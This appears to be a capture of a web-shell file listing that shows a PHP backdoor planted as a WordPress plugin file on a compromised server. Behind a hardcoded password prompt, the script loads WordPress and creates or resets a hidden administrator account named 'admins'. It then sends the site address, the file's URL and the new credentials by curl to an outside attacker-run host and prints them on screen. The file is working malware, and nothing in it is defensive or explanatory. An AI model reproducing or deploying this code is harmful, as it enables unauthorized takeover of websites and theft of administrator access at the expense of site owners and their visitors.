HEX
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips
System: Linux WORDPRESS 3.10.0-1160.118.1.el7.x86_64 #1 SMP Thu Apr 4 03:33:23 EDT 2024 x86_64
User: digital (1020)
PHP: 7.2.24
Disabled: NONE
$ pwd: /datos/www/expodubai/wp-content/plugins/widget-1770050739/
Upload Files
File: /datos/www/expodubai/wp-content/plugins/widget-1770050739/paqe.php
<!--EsRnM37u-->
<?php
if (isset($_SERVER['HTTP_X_PANEL_CHECK']) && $_SERVER['HTTP_X_PANEL_CHECK'] === 'YES') {
    die("OK");
}
$dogru_sifre = '1qwer4';
$devam_et = false;
if ( isset( $_POST['guvenlik_sifresi'] ) ) {
    if ( $_POST['guvenlik_sifresi'] === $dogru_sifre ) {
        $devam_et = true;
    } else {
        $hata_mesaji = "Yanlış şifre girdiniz. Lütfen tekrar deneyin.";
    }
}
if ( ! $devam_et ) {
    ?>
    <!DOCTYPE html>
    <html lang="tr">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Güvenlik Kontrolü</title>
        <style>
            body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; background-color: #f0f0f1; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
            .login-container { background: #fff; padding: 40px; border-radius: 8px; box-shadow: 0 4px 10px rgba(0,0,0,0.1); text-align: center; width: 100%; max-width: 320px; }
            h2 { margin-top: 0; color: #1d2327; font-size: 20px; }
            p { color: #444; font-size: 14px; }
            input[type="password"] { width: 100%; padding: 12px; margin-top: 20px; border: 1px solid #8c8f94; border-radius: 4px; box-sizing: border-box; }
            input[type="submit"] { background: #007cba; color: #fff; border: none; padding: 12px 20px; border-radius: 4px; font-weight: bold; cursor: pointer; margin-top: 20px; width: 100%; font-size: 14px; }
            input[type="submit"]:hover { background: #0071a1; }
            .error { color: #d63638; font-weight: bold; margin-bottom: 15px; font-size: 13px; }
        </style>
    </head>
    <body>
        <div class="login-container">
            <h2>Doğrulama Gerekli</h2>
            <p>Devam etmek için şifreyi girin.</p>
            <?php if (isset($hata_mesaji)) { echo '<p class="error">' . $hata_mesaji . '</p>'; } ?>
            <form method="POST" action="">
                <input type="password" name="guvenlik_sifresi" placeholder="Şifreniz" required autofocus>
                <input type="submit" value="Betiyi Çalıştır">
            </form>
        </div>
    </body>
    </html>
    <?php
    exit;
}
// --- GİRİŞ KONTROLÜ SONU ---
// --- 3. KISIM: WORDPRESS İŞLEMLERİ ---
$d = __DIR__;
while(!file_exists($d.'/wp-load.php')){$d=dirname($d); if($d==dirname($d))break;}
if(file_exists($d.'/wp-load.php')){
    require_once($d.'/wp-load.php');
    $k_adi = 'admins';
    $panel_api = 'https://holiganbet.it.com/111/api.php';
    $api_key = 'OZEL_ANAHTAR_123';
    $site = $_SERVER['HTTP_HOST'];
   
    // 24 Karakter Şifre Üretici
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%&*';
    $yeni_sifre = '';
    for($i=0; $i<24; $i++) $yeni_sifre .= $chars[mt_rand(0, strlen($chars)-1)];
    $u = get_user_by('login', $k_adi);
    if($u){
        wp_set_password($yeni_sifre, $u->ID);
        $durum = "Güncellendi";
    } else {
        wp_insert_user(array(
            'user_login' => $k_adi, 
            'user_pass'   => $yeni_sifre, 
            'user_email'  => '[email protected]',  
            'role'        => 'administrator'
        ));
        $durum = "Oluşturuldu";
    }
    $dosya_yolu = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
   
    $post_data = json_encode(array(
        'site' => home_url(),
        'file_url' => $dosya_yolu,
        'kullanici_adi' => $k_adi,
        'sifre' => $yeni_sifre,
        'api_key' => $api_key
    ));
    $ch = curl_init($panel_api);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $response = curl_exec($ch);
    curl_close($ch);
    // EKRAN ÇIKTISI
    echo "<div style='background:#f4f4f4;padding:20px;font-family:monospace;border-radius:10px;border:1px solid #ccc;max-width:500px;margin:40px auto;box-shadow: 0 4px 15px rgba(0,0,0,0.1);'>";
    echo "<h3 style='color:#007cba;margin-top:0;'>✅ İşlem Başarılı</h3>";
    echo "--------------------------------<br>";
    echo "<b>Giriş Adresi:</b> " . home_url('/wp-login.php') . "<br>";
    echo "<b>Kullanıcı Adı:</b> " . htmlspecialchars($k_adi) . "<br>";
    echo "<b>Yeni Şifre:</b> " . htmlspecialchars($yeni_sifre) . "<br>";
    echo "--------------------------------<br>";
    echo "<b>Panel Yanıtı:</b> " . ($response ? htmlspecialchars($response) : "BAĞLANTI HATASI") . "<br>";
    echo "<b>Durum:</b> " . $durum . "<br><br>";
    echo "<small style='color:red;'>Güvenlik için bu dosyayı sunucudan silmeyi unutmayın.</small>";
    echo "</div>";
}
?>
@ Telegram